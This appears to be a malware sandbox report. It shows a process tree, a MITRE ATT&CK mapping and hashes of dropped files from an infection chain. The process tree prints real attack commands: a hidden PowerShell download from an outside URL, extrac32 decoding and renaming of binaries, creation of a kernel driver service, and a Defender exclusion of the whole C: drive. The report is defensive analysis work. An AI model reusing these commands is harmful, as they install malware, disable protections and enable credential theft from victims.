hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:3640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:112
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      PID:4400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4672
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:1980
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HnqtinbxF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3452
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3600
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1804
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
        9⤵
        
        PID:4680
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
        9⤵
        
        PID:4944
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
        9⤵
        
        PID:1588
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3304
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        10⤵
        Executes dropped EXE
        
        PID:2228
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1980
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif start TrueSight
        10⤵
        Executes dropped EXE
        
        PID:1608
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4312
        
        C:\Users\Public\aken.pif
        
        C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2248
      - C:\Users\Public\Libraries\xbnitqnH.pif
        
        C:\Users\Public\Libraries\xbnitqnH.pif
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2548
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1016

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv 76g63deg0k6CYsDtk47YKA.0.2
1⤵
PID:2228

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:4512

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
PID:1056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:2544

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5704

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:5844

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:6016

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:6100

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:2596

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:2432

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
PID:3716

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:4740

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:5048

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2416

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:3576

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2168

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:5376

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:5500

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:2248

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5144

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:5220

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5388
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:3464
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 912 916 924 8192 920 896
  2⤵
  - Modifies data under HKEY_USERS
  PID:6040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
1293a52ee3b8cf4399b952a89e68f260

SHA1
8c89c9a2af0a9ce827f68b2612f17e92f3d1de77

SHA256
4178fbcc4c2f7195abc4e68e2c5d9ce7d3ed5b22134697344b450b08bac31b0d

SHA512
37af82cf6a4fffd484425ce180d32654257b30a6b2c8aeb603e093670ebe4077b68418ec917ec1ce8a8473fb377fe23a44a71c177d64863798952e0157992387

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.3MB

MD5
a2ed255f1e85941c498e6cd37cc60833

SHA1
7e5390af676dcaa2173780358c436772bb78de81

SHA256
8a314565f1314b33d30fa29274d3962f3f9d51a0d5936d45687c63577c9eb870

SHA512
931e891754a21a726c51ed4be7669a6a75d57f2952989c75ba3f2b45378733050ca3d078f099198ad517de891a2aa81b7ed1eb5a2be2573e17938fa1d6dd54c2

Download Submit
C:\Program Files\7-Zip\7z.exe

Filesize
1.6MB

MD5
fea250f972de3ff49aa7c62c42147c6f

SHA1
a92ee9a73a8b0f7043f18c7a4403e8cbada2b055

SHA256
99b0fc1966ce8b69d673ff0e94994ee879828488dc757379659f769f2ac4756d

SHA512
9ec159aeacec524db41bc1e43b7df7f88adf80bf6ef70d526c615a4ea7b0f1dd1c0d89232c9858c8f00de96c485897625f03cf21ae301698f3ff3f6f051a35f9

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
1.5MB

MD5
115191160b65823f014431bfe24ea2fe

SHA1
4e1ae68804d4d81afbb5abed746fac9767b06391

SHA256
746203e9329dece85ea8d92ebde628e8f2625d2b2664c7f3bc44d9fbd7549312

SHA512
732f16b0e9f4d1ac6812a3609936b413288aae32a9213518402f8e2c7ac719393e7f10c663cd3d4ec4724c88d6753a4e6a8e1357201f45c6518bb7217024794e

Download Submit
C:\Program Files\7-Zip\7zG.exe

Filesize
1.2MB

MD5
b50444a1c0962d1276af30a234c00c29

SHA1
075deb3d8ddfd21c650005e93e7e583c2c92efc5

SHA256
50ae8d0e18094aa5b1532c87182a42e1145bc3ce93fae5ba3ec5279ed37a0550

SHA512
bd17b8c3284ef1517a8e0f48356c37172ca4101869dbc2eeecb6eeb71b914697a97de96a840d2efc4e759991f39b3b598a97084360fddcb018423e60190e83af

Download Submit
C:\Program Files\7-Zip\Uninstall.exe

Filesize
1.1MB

MD5
2673561a5b7ee21ce9eabb2cbef698dc

SHA1
1d13a91488ba908a14875570742a6be73f1c9aea

SHA256
32e417f83c1774ba560db82764f38b3eec469eea8c0e07f9d2c3641d1c434544

SHA512
6a05e7dbeb1408db6c6311bcf8d8d91031090f9e8c0c95a8b6573f0b2cfc35da229bd0a9b566b57a0a6bc0e0a7c3868bd81cca4ca75fa0a2bbcd364040872a9d

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Filesize
1.3MB

MD5
16acca900bd6f9de14c0d9017181ea27

SHA1
d777bbf8dc0aeab2130ac1385ab740ad5c96cea4

SHA256
a06451d5e04a828dde4cd246b6f99ccefb1ed441b7f6f63f43e83b82080af6a0

SHA512
936ed22c8ba759b3432b9c0ea27845a05814ceeab95d49e3b4fdec34869054ee62c04a6314742d3b18a54ab9264c0f920b749a85c647daff2cbce7c5b19fa5dd

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Filesize
2.7MB

MD5
3b0a6739659ffd513c30ba0d9717b86d

SHA1
25411e6e5e11dbd2297914e799e3424eb46eb6c6

SHA256
6565cb6d5f8143e12d7d4f7a7db827600b9b38a2a612f0974b0338728231dbaa

SHA512
2a3e188e965805cc3a56cc8fed59c2db4ce3d8332c9443d6eb57696ddd01d5d312feaea104b9bd394cefaef464b91f4a422e3a29390ad82b73448d2940a10338

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
9cbb80ea9d983f6341465008aee2b7ca

SHA1
5835b730946c042dcacc4cd1253368171ccd89b7

SHA256
b21de1a7e2a8ffe70b5a46c4434e9672e4f4bda4c82caa612a89b21a0751e939

SHA512
51067c3ca48703bdb5514605cc760be78346ac87ca02ccd363c38813b8857ed3b96583021c2f4c3eab5c3fbc205ad64c4977dfa815a9665a67eec7a4e3d8b60a

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
773ce4b0460757cee456c92aaae80165

SHA1
37b10f4f11e3959d7c6d116d8989189453b43216

SHA256
170cff86df26325fd8b5224b529da510f9f75ef9fcc325d61941102817e70c13

SHA512
bdfb1f543d84f7f5839cfd50d78fbf17316a5b60fdf4b15bd4ee18dacd2d0b952db278aff97d0ffbce89bb2d0bf6f0175ca322abe18ca71c2933f2587ee035d5

Download Submit
C:\Program Files\Windows Media Player\wmpnetwk.exe

Filesize
1.5MB

MD5
3a486aec5d1da444c895f5fc137d1506

SHA1
62b2cbf269829420f18e233016d7ddcbb197db69

SHA256
2e45fe74bf378791f9c0ea49fcb2b303559154667a1ae07701acef862d859d6d

SHA512
26e3e9cfdd63455323517a3274cf0c9af4e9b8c28af62c43b7fe1790973a43efccdc7eb5314fb4d72d6b28b9cb4d09807c2f6dfac8691196f620b229137536c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xhchhg4e.zq4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
988KB

MD5
1d72e2b8a6cb15d3669376eadc4d4b09

SHA1
953c07f56947255c2974049349a3ac019c74f472

SHA256
6943783baf38adb80a064fb099a753de317015f0b660e3b4f3b1c201cfbdf3ac

SHA512
a476a17e7eb315b25ace3101ed5ad05964d3cbb14a9a212e1f2de030d2dc945d7d2f14b0b9df4e85db601b100d78e9e50fa189df348ad4c1548d41bdd1d7c883

Download Submit
C:\Users\Public\Hnqtinbx.url

Filesize
104B

MD5
76046b89375a666f0c8cb5002a1f8a07

SHA1
9ebb111dd96218a7e666913f423f267990455306

SHA256
b35d0fe2ae4b0dc9c9de755cdb56d14179d259999999f28082940dc243b374ae

SHA512
25a880cbc822b03399e5ac4495df0527b0f0a718164313b0bfac6e715de8244892b67ce90612c387964ddbb3065f7d051dda922c92058b397000035eab60a4b0

Download Submit
C:\Users\Public\HnqtinbxF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\Hnqtinbx

Filesize
1.6MB

MD5
3e6ae8dafe3b2d168a4d70f46ff576d7

SHA1
2af35dede172cdbc64c6c3e9bf68ed563ca1f87d

SHA256
00622d5b65d9cebefc597f3296837f6dc84f4e53136340968de11aca8e3d62a5

SHA512
afcec02281b6d7770e145d665df5a613619f37840c4d4f9ab6d38e46e5a5012acc85f37770a2736c228de688fad2b018a0a5ee1fd7dad15eabc658b3121eb52a

Download Submit
C:\Users\Public\Libraries\Hnqtinbx.mp3

Filesize
52KB

MD5
f53fa44c7b591a2be105344790543369

SHA1
363068731e87bcee19ad5cb802e14f9248465d31

SHA256
bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c

SHA512
55b7b7cda3729598f0ea47c5c67761c2a6b3dc72189c5324f334bdf19bef6ce83218c41659ba2bc4783daa8b35a4f1d4f93ef33f667f4880258cd835a10724d9

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
55KB

MD5
3c755cf5a64b256c08f9bb552167975c

SHA1
8c81ca56b178ffd77b15f59c5332813416d976d7

SHA256
12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

SHA512
8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

Download Submit
C:\Users\Public\Libraries\xbnitqnH.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\Upha.pif

Filesize
70KB

MD5
3fb5cf71f7e7eb49790cb0e663434d80

SHA1
b4979a9f970029889713d756c3f123643dde73da

SHA256
41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

SHA512
2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

Download Submit
C:\Users\Public\aken.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\alpha.pif

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\df.cmd

Filesize
988KB

MD5
3353a1cc2a5dabca2e40faa9d5520cf4

SHA1
a98b8be630118989f3beceecc34fd524dae0f05c

SHA256
5c1f323caf7247e020dcfcd4cfc413afb6a19828fd4f9099c24f3635c62c8698

SHA512
fa4e3f1c4b7dfcc66c6c4d8fd2a91821d5a06bc9c282b03b15392e1bb6175d2679837a8d3143bf7b32ed252bacd8c295337a2fec11cefc3deda70a02215d4930

Download Submit
C:\Users\Public\ript.exe

Filesize
157KB

MD5
24590bf74bbbbfd7d7ac070f4e3c44fd

SHA1
cdfe517d07f18623778829aa98d6bbadd3f294cd

SHA256
ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

SHA512
ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

Download Submit
C:\Windows \SysWOW64\NETUTILS.dll

Filesize
116KB

MD5
0f088756537e0d65627ed2ea392dcaae

SHA1
983eb3818223641c13464831a2baad9466c3750f

SHA256
abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

SHA512
d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
C:\Windows\SysWOW64\perfhost.exe

Filesize
1.1MB

MD5
3c34b05eb4bc2984a8d0a0c0bd704bd1

SHA1
e950499cdb73bf52cd0999e22f401c5fa40f86a7

SHA256
b9dccaaccb25b3b060d7d807b50527e4020699cc6f20256b58cba3c0ef8fb41f

SHA512
099075840bf26f7d86858a7f00061ccad2847608d262459b100d61703b0e5e41153613b522d596c55f46dbfff1ad755e107cc2659b63745803e2b741fb0b7e66

Download Submit
C:\Windows\System32\AgentService.exe

Filesize
1.7MB

MD5
342deb7562dc099a2563bb874fef1cd8

SHA1
b315de9937f86f886b6ba65da6df54ad9a79e1e9

SHA256
9d1515b90ff6e12a9cf6ababc0c23fde93ab8fc73cdc99aadbec7b096edef0a5

SHA512
2c88ec57d276bafb92643343049f2f1eae05183c79125dab8f0dfbab045ace8ff96e1450ec20d44c350fb348f8ac2d9ff220d9285eb52ae7b7f33536a7bd8624

Download Submit
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Filesize
1.2MB

MD5
2c4a01c76c6950cb9899d0346752057f

SHA1
79f277f2520dabada8c2790715602a7faf821a1a

SHA256
e1c05e126f87b7101298b38a3e3bb282643866ca802096e5c6aa7b1baca2c021

SHA512
1c2efce34aec00958eaaa168465894f47a513ec1a40c832212c8327d77e2de87e556ca6d8eaffa26ace11f803d9dfd0f83b104dd6cc7d4dbbc89064c620008c8

Download Submit
C:\Windows\System32\FXSSVC.exe

Filesize
1.2MB

MD5
0bcc85ec3239078929e14c0d2527b36c

SHA1
d81ee7278350663642ff0ebdc2cd6156def2e00b

SHA256
f3cd52aa735372632b18a6a826a2f6f5dd6c260063683086f763055ed07eadc6

SHA512
4913507a7ef21e30371ed2f2744460048ff7fe683a69dc0dad71ad2560e4722d479468d2758df87635c4b2b19732372601cbe8ff3229c48d439709943ce06fc0

Download Submit
C:\Windows\System32\Locator.exe

Filesize
1.1MB

MD5
a0c662edec21472e697602173e2ecdc8

SHA1
fd863a1f59c444432bac7755ae8f5136c48226d2

SHA256
507f13982b68669329c69b43aa8468af02b083acd1d82c5039ae3e5014bda3fe

SHA512
3e2771a60b0e7b0952bbdc7040364c95fa60c60916b5380b9d7fff6fe0ec87b5cdecbfb4250403cd8c71a92834ddcaadbd1506a7eabfeb8951a32d09a63d47ce

Download Submit
C:\Windows\System32\OpenSSH\ssh-agent.exe

Filesize
1.4MB

MD5
84184880f038346eb47f52c1420e8c1c

SHA1
cdd4cf9dc347e49d46b1c411c18dde04c9c12253

SHA256
a71bbe6834b828fcb77deb4fe1c8a10fb2e00172254ce09c0930d518c987a30a

SHA512
0fa7a7dc82e380803c9aa68c2788b7562627a58ffdaad22eca36791dbfaf34bb52cc622323ea4e0b645fd5e9d966469fffd7273b1dd2b264a0659784e07f0832

Download Submit
C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Filesize
1.2MB

MD5
62f11db8d0ef3bf5dd32afcdad4e15d1

SHA1
b5c8527db52ac0d567a1aa89da66a8a0f581ad60

SHA256
02fe9273d6e80a41f6f261ab4ac8810763eede0276819b9d909e20e74f24f071

SHA512
2b191096d9838581a41fe818369fa5ad883db0696fbc9bc3e56f4b3af9e999f7dc4a7be16467400231d7213eac1132658494ec16873bec6606c46e718908f41b

Download Submit
C:\Windows\System32\SearchIndexer.exe

Filesize
1.4MB

MD5
15b4843c38c9d285eeab291dc1dcb3d2

SHA1
595d3ac2b756e478cc2855ad295420847e4be883

SHA256
704dc8dbfde0e7431fa0a6a1a934271edba7f8a87d400a4d69b3c09629a73c4d

SHA512
f526939fd8bf5bd1b5d0699dec9e1adf336e40b9d4875a40f69056d09f96ed21e46a8e2ea622cba3fd5d3db04613556a31c59d204d2fe888539f00faa49a52e8

Download Submit
C:\Windows\System32\SensorDataService.exe

Filesize
1.8MB

MD5
313c025b2ba79d15ac1c4a02bc71b1de

SHA1
b0eeb502048100c97c82a9a59dfddf908559e8e1

SHA256
0eaeb3f6c709195c4841283531485100ad6b9ec7d668c8d68e17ce3084adb073

SHA512
